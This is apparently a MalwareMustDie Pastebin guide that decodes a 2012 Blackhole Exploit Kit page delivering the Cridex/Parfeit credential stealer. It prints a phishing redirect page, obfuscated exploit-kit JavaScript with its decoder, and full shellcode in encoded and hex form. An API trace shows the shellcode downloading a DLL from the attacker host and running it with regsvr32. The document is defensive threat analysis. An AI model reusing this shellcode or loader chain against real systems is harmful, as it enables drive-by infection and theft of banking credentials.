MalwareMustDie

#malwareMustDie - BHEK decodeGUIDE (payload: Cridex/Parfeit)

Dec 22nd, 2012
131
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # MalwareMustDie - PluginDetect Decoding Guide
  2. # for the Trojan parfeit Investigation
  3. # (Credential Stealer Case)
  4. ------------
  5.  
  6. --18:06:57--  h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.htm
  7.            => `cpa_inform.htm'
  8. Resolving www.irwra.com... 50.116.98.44
  9. Connecting to www.irwra.com|50.116.98.44|:80... connected.
  10. HTTP request sent, awaiting response... HTTP/1.1 200 OK
  11.  
  12. // real time with Xurl..
  13.  
  14. @unixfreaxjp /malware]$ Xurl h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.html |jless
  15.  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
  16.                                 Dload  Upload   Total   Spent    Left  Speed
  17. 100   813  100   813    0     0   1187      0 --:--:-- --:--:-- --:--:--  4567
  18. <html>
  19. <head>
  20. <title>Processing request... Banking, Credit Cards, Lending & Investing - CPA</title>
  21.  
  22. <script type="text/javascript">
  23. <!--
  24. location.replace("h00p://latticesoft.net/detects/continues-little.php");
  25. //-->
  26. </script>
  27. <noscript>
  28. <meta http-equiv="refresh" content="0; url=h00p://latticesoft.net/detects/continues-little.php">
  29. </noscript>
  30.  
  31. </head>
  32.  
  33. <h1>You will be redirected to details of purchase</h1>
  34.  
  35.  
  36. <h4 style="color:#364dbc;">We must complete few security checks to show your transfer details:</h4>
  37.  
  38. <h3>Be sure you have a transfer reference ID.<br />You will be asked to enter it after we check the link.<br><br>Important: Please be advised that calls to and from your wire service team may be monitored or recorded.<br /></h3>
  39.  
  40. <h3>Redirecting to Survey details... Please wait...</h3>
  41.  
  42.  
  43.  
  44. </html>
  45.  
  46. ------------------------------------------------
  47.  
  48. --2012-12-22 03:44:27--  h00p://latticesoft.net/detects/continues-little.php
  49. Resolving latticesoft.net (latticesoft.net)... 59.57.247.185
  50. Caching latticesoft.net => 59.57.247.185
  51. Connecting to latticesoft.net (latticesoft.net)|59.57.247.185|:80... connected.
  52.  
  53. ---request begin---
  54. GET /detects/continues-little.php HTTP/1.1
  55. Referer: http://www.irwra.com//wp-content/themes/mantra/uploads/cpa_inform.html
  56. User-Agent: #MalwareMustDie!
  57. Accept: */*
  58. Host: latticesoft.net
  59. Connection: Keep-Alive
  60. HTTP request sent, awaiting response...
  61.  
  62. ---response begin---
  63. HTTP/1.1 200 OK
  64. Server: nginx/1.3.3
  65. Date: Fri, 21 Dec 2012 18:44:29 GMT
  66. Content-Type: text/html
  67. Transfer-Encoding: chunked
  68. Connection: close
  69. X-Powered-By: PHP/5.3.14
  70. 200 OK
  71. Length: unspecified [text/html]
  72. Saving to: `continues-little.php'
  73. 2012-12-22 03:44:33 (28.7 KB/s) - `continues-little.php' saved [95903]
  74.  
  75. --------------------------------------------------------
  76.  
  77. TRY TWO:
  78.  
  79. --14:18:07--  h00p://latticesoft.net/detects/continues-little.php
  80.           => `continues-little.php.1'
  81. Resolving latticesoft.net... seconds 0.00, 59.57.247.185
  82. Caching latticesoft.net => 59.57.247.185
  83. Connecting to latticesoft.net|59.57.247.185|:80... seconds 0.00, connected.
  84. Created socket 1896.
  85. Releasing 0x003d5348 (new refcount 1).
  86. ---request begin---
  87. GET /detects/continues-little.php HTTP/1.0
  88. Referer: h00p://www.irwra.com//wp-content/themes/mantra/uploads/cpa_inform.html
  89. User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
  90. Accept: */*
  91. Host: latticesoft.net
  92. Connection: Keep-Alive
  93.  
  94. ---request end---
  95. HTTP request sent, awaiting response...
  96. ---response begin---
  97. HTTP/1.1 200 OK
  98. Server: nginx/1.3.3
  99. Date: Sat, 22 Dec 2012 05:17:56 GMT
  100. Content-Type: text/html
  101. Connection: close
  102. X-Powered-By: PHP/5.3.14
  103.  
  104. ---response end---
  105. 200 OK
  106. Length: unspecified [text/html]
  107. 14:18:13 (25.29 KB/s) - `continues-little.php.1' saved [91337]  <=============== the size changes....
  108.  
  109.  
  110. ---------------
  111. // CHANGES!!!!!! WHy? What?
  112. // what had changed??
  113. // let's use unix's diff command to diff the previous code w/new one and see what's changes the moronz did:
  114.  
  115. 0x001c1
  116.  
  117. < <html><head><title></title></head><body>
  118. <applet archive="/detects/continues-little.php?zasyymcc=vwg&ncnjr=qjx" code="&#00104;&#00119;">
  119. <param value="Dyy3Ojj-Vyy8%eit.ywoeyjMeye%yi" name="&#00118;&#0097;&#00108;"/>
  120. <param value="j%toy8oKeim-8yy-ew3D3xe.b1fO6oO68O68O11R8eb6oOh_O68O6CO6tO68O6AOhvO60O60RMb6.RC3bvRl?bS" name="&#00112;&#00114;&#00105;&#00109;&#00101;" />
  121. </applet><div></div><script>dd="i";pp="e"+"In";asd=function(){for(i=0;;i++){
  122.  
  123.  
  124. 0x007c7
  125.  
  126. < <script>a.setAttribute("z5","-2f666eb-46996eb-671g4fc-6bkg4
  127. 2e5907a-8h8h8dg-671dmf3-3e5dgf9-1g7ff66-4698heh-3e866e8-871eh
  128. 6696969-0h88hfl-4e5g4g7-7flf955-5djh8h8-56iebe5-3g4c6e5-4flg1
  129. 3f98heh-1e866e8-171ebe5-6g4c6e5-9flg1eh-3fcf99l-0fcf9e5-15890
  130. 271g1ff-1f3ehg4-0b5g7f6-7bhe5eb-9gg6idg-671ebe5-2g4c6e5-1flg1
  131. 7e56669-2h8h86i-2dge2e2-6c9ehf9-6a1gae5-2f9g48e-9e8g7f9-9dmg4
  132. 7g4dgdm-2eea1ga-0e5f9g4-2665bfc-3f95b6f-8e26idm-269h8e5-4f3g1
  133. 8e8g7f9-7dmg177-68ecld4-96ic9am-2e8g7f9-8dmg18e-8cld46i-3flg7
  134. -8e5f9g4-26idg90-6e271eb-7e5g4a1-3f3e5f6-1e5f9g4-0g19fgj-9c0d
  135. -5e5f9g4-1g19fgj-9c0dgeb-8b5dgf6-3e5665b-0djfce2-2gj5b69-6cl7
  136. -16iff6i-0fc90f6-171dmfl-1e5dgg4-1e5a1f3-4e5f6e5-6f9g466-85bg
  137. -7f9e56l-2g1g4gj-7f3e58e-6f9fcf9-5e58hdj-5fcfle2-5e5fl6l-8g1g
  138. -8dgg1e5-4666971-0fle5ff-7f3dgdm-0e56674-6d1g174-4eb6i5b-45b6
  139.  
  140. 0x018c18
  141.  
  142. <   if(a["su"+"bstr"](i,1)=="-")i+=2;
  143. ---
  144. >   if(a["substr"](i,1)=="-")i+=2;
  145.  
  146. // yep, the moronz was changing the jar applet infector (0x001c1) &
  147. // it changed the obfuscation code (0x007c7) and also -
  148. // making more scattered strings for the obfs generator code (0x018c18)
  149.  
  150. // These three changes suggested the payload has changed.
  151. // Nevermind with the old payload so we get into the new one!
  152.  
  153. --------------------------------------------------------
  154.  
  155. // See the latest code...
  156.  
  157. // let's strip the garbage html code & make it more viewable..
  158. // then see which are th epart of obfuscation & its sturcture,
  159. // and recognize where's obfuscated data feed code & decoding generator code.
  160.  
  161. // After that go to the obfuscation part and undersatnding the structure < important!
  162. // In this case those malware moronz is splitting obfuscation code within a.setAttribute()
  163. // arrays using scripts tags, just adjust them by deleting all <script></script>
  164. // tags and you're good to go.
  165.  
  166. // So, the structure of the current obfuscated structure is:
  167.  
  168. a.setAttribute("z0","-[0-9|a-z]...-[0-9|a-z]");
  169.                z0+1
  170.                :
  171.                z29
  172.  
  173. // And this is the code to feed obfuscated data...
  174.  
  175. dd="i";
  176. pp="e"+"In";
  177.  
  178. asd=function()
  179.   {
  180.   for(i=0;;i++)
  181.       {
  182.       r=a.getAttribute("z"+i);if(r){s=s+r;}else break;
  183.       }};
  184. a=document.createElement(dd);
  185.  
  186.  
  187. // Thus, this is the generator part to crack the code;
  188.  
  189. document.body.appendChild(a);
  190. if(document.getElementsByTagName("d"+"iv")[0].style.left==="")
  191. {
  192.   ss=String.fromCharCode;
  193.   a=document["getElementsB"+"yTagName"](dd);
  194.   a=a[0];
  195.   s=new String();
  196.   asd();
  197.   a=s;
  198.   s=new String();
  199.   e=window["eva"+"l"];
  200.   p=parseInt;
  201.   for(i=0;a.length>i;i+=2)
  202.   {
  203.     if(a["su"+"bstr"](i,1)=="-")i+=2;
  204.     s=s+(ss((p(a["substr"](i,2),23)-24)/3));
  205.   }
  206.   try
  207.   {
  208.     document.body*=document;
  209.   }
  210.   catch(asfas)
  211.   {
  212.     e("if(1)"+s);
  213.   }
  214. }
  215.  
  216.  
  217. // And this is the logic formula to crack :
  218.  
  219.   // here's the formula...
  220.   for(i=0;a.length>i;i+=2)
  221.   {
  222.     if(a["substr"](i,1)=="-")i+=2;
  223.     s=s+(ss((p(a["substr"](i,2),23)-24)/3));
  224.   }
  225.  
  226.  
  227. // You can manipulate the decoding operation easlizy by making
  228. // array of a element and feed the array 0 to 29 with
  229. // the garbled code one by one and just feed it into the
  230. // formula.
  231.  
  232.  
  233. //And the result is the NEW PLUGINDETECT OBFS code (v 0.7.9)
  234.  
  235. var PluginDetect =
  236. {
  237.   version : "0.7.9", name : "PluginDetect", handler : function (c, b, a)
  238.   {
  239.     return function ()
  240.     {
  241.       c(b, a)
  242.     }
  243.   }
  244.   , openTag : "<", isDefined : function (b)
  245.   {
  246.     return typeof b != "undefined"
  247.   }
  248.   , isArray : function (b)
  249.   {
  250.     return (/array/i).test(Object.prototype.toString.call(b))
  251.        :
  252.        :(blah! etc)
  253.  
  254. //let's modify shellcode to grab the payload:
  255.  
  256. var a = "8282!%51c4!%04e4!%25e0!%f551!%e014!%9134!%4451!%54e0!%2191!%9154!%e521!%21a1!%91f4!%1421!%2191!%9174!%2421!%2191!%9114!%f521!%21a1!%9164!%d451!%e0f4!%b181!%2421!%2191!%91e4!%e521!%21a1!%b181!%e451!%7125!%0485!%6085!%44d4!%c5c5!%4414!%b550!%d5d4!%1464!%64c5!%b474!%b570!%b4c5!%c5d4!%c4d4!%c570!%64d4!%c560!%74e4!%d4b5!%14b4!%c5c5!%4494!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e80!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
  257. var x=a["replace"](/\%!/g, "%" + "u");
  258. document.write(x);
  259.  
  260. ↓↓
  261.  
  262. %u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u08e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u4944%u5c5c%u4b41%u5b4d%u4e47%u065c%u4d46%u075c%u4d4c%u4d5c%u5c4b%u075b%u474b%u5c46%u4641%u4d5d%u055b%u4144%u5c5c%u4d44%u5806%u5840%u5217%u154e%u181b%u1a12%u125e%u4e19%u1912%u1242%u181b%u4f0e%u154d%u4619%u1a12%u125f%u4119%u1912%u1242%u4719%u1912%u1241%u4f19%u1a12%u125e%u4519%u1912%u0e45%u1544%u4319%u410e%u155f%u0e52%u4e40%u4c15%u2828
  263.  
  264.  
  265. // here's the shellcode (in bin & text)....
  266.  
  267. 41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81   AAAAf......X1.f.
  268. e9 08 fe 80 30 28 40 e2  fa eb 05 e8 eb ff ff ff   ....0(@.........
  269. ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3   ..]..w..L.h..h$.
  270. 58 34 7e a3 5e 20 1b f3  4e a3 76 14 2b 5c 1b 04   X4~.^...N.v.+\..
  271. a9 c6 3d 38 d7 d7 90 a3  68 18 eb 6e 11 2e 5d d3   ..=8....h..n..].
  272. af 1c 0c ad cc 5d 79 c1  c3 64 79 7e a3 5d 14 a3   .....]y..dy~.]..
  273. 5c 1d 50 2b dd 7e a3 5e  08 2b dd 1b e1 61 69 d4   \.P+.~.^.+...ai.
  274. 85 2b ed 1b f3 27 96 38  10 da 5c 20 e9 e3 25 2b   .+...'.8..\...%+
  275. f2 68 c3 d9 13 37 5d ce  76 a3 76 0c 2b f5 4e a3   .h...7].v.v.+.N.
  276. 24 63 a5 6e c4 d7 7c 0c  24 a3 f0 2b f5 a3 2c a3   $c.n..|.$..+..,.
  277. 2b ed 83 76 71 eb c3 7b  85 a3 40 08 a8 55 24 1b   +..vq..{..@..U$.
  278. 5c 2b be c3 db a3 40 20  a3 df 42 2d 71 c0 b0 d7   \+....@...B-q...
  279. d7 d7 ca d1 c0 28 28 28  28 70 78 42 68 40 d7 28   .....((((pxBh@.(
  280. 28 28 78 ab e8 31 78 7d  a3 c4 a3 76 38 ab eb 2d   ((x..1x}...v8..-
  281. d7 cb 40 47 46 28 28 40  5d 5a 44 45 7c d7 3e ab   ..@GF((@]ZDE|.>.
  282. ec 20 a3 c0 c0 49 d7 d7  d7 c3 2a c3 5a a9 c4 2c   .....I....*.Z..,
  283. 29 28 28 a5 74 0c 24 ef  2c 0c 5a 4d 4f 5b ef 6c   )((.t.$.,.ZMO[.l
  284. 0c 2c 5e 5a 1b 1a ef 6c  0c 20 08 05 5b 08 7b 40   .,^Z...l....[.{@
  285. d0 28 28 28 d7 7e 24 a3  c0 1b e1 79 ef 6c 35 28   .(((.~$....y.l5(
  286. 5f 58 4a 5c ef 6c 35 2d  06 4c 44 44 ee 6c 35 21   _XJ\.l5-.LDD.l5!
  287. 28 71 a2 e9 2c 18 a0 6c  35 2c 69 79 42 28 42 28   (q..,..l5,iyB(B(
  288. 7b 7f 42 28 d7 7e 3c ad  e8 5d 3e 42 28 7b d7 7e   {.B(.~<..]>B({.~
  289. 2c 42 28 ab c3 24 7b d7  7e 2c ab eb 24 c3 2a c3   ,B(..${.~,..$.*.
  290. 3b 6f a8 17 28 5d d2 6f  a8 17 28 5d ec 42 28 42   ;o..(].o..(].B(B
  291. d6 d7 7e 20 c0 b4 d6 d7  d7 a6 66 26 c4 b0 d6 a2   ..~.......f&....
  292. 26 a1 47 29 95 1b e2 a2  73 33 ee 6e 51 1e 32 07   &.G)....s3.nQ.2.
  293. 58 40 5c 5c 58 12 07 07  44 49 5c 5c 41 4b 4d 5b   X@\\X...DI\\AKM[
  294. 47 4e 5c 06 46 4d 5c 07  4c 4d 5c 4d 4b 5c 5b 07   GN\.FM\.LM\MK\[.
  295. 4b 47 46 5c 41 46 5d 4d  5b 05 44 41 5c 5c 44 4d   KGF\AF]M[.DA\\DM
  296. 06 58 40 58 17 52 4e 15  1b 18 12 1a 5e 12 19 4e   .X@X.RN.....^..N
  297. 12 19 42 12 1b 18 0e 4f  4d 15 19 46 12 1a 5f 12   ..B....OM..F.._.
  298. 19 41 12 19 42 12 19 47  12 19 41 12 19 4f 12 1a   .A..B..G..A..O..
  299. 5e 12 19 45 12 19 45 0e  44 15 19 43 0e 41 5f 15   ^..E..E.D..C.A_.
  300. 52 0e 40 4e 15 4c 28 28                            R.@N.L((        
  301.  
  302. // And the translation of the API.....
  303.  
  304. 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
  305. 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
  306. 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
  307. 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=http://latticesoft.net/detects/continues-little.php?zf=30:2v:1f:1j:30&ge=1n:2w:1i:1j:1o:1i:1g:2v:1m:1m&l=1k&iw=z&hf=d , lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
  308. 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  309. 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)   
  310. 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
  311.  
  312. ----
  313. #MalwareMustDie!
  314. unixfreaxjp /malware]$ date
  315. Sat Dec 22 18:59:02 JST 2012
RAW Paste Data